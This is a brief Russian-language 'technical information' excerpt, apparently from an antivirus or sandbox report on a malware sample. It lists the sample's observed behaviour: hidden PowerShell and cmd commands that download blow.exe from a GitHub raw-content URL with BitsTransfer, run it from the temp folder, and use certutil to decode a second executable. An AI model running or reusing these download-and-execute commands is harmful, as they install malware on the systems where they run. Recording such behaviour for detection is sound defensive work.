Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe
- 'ra#.####ubusercontent.com':443
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com
- '<SYSTEM32>\cmd.exe' /c powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jocofid282/tewsa/master/blow.exe,https://raw.githubuserconten...
- '<SYSTEM32>\certutil.exe' -decode %TEMP%\dera %TEMP%\dera.exe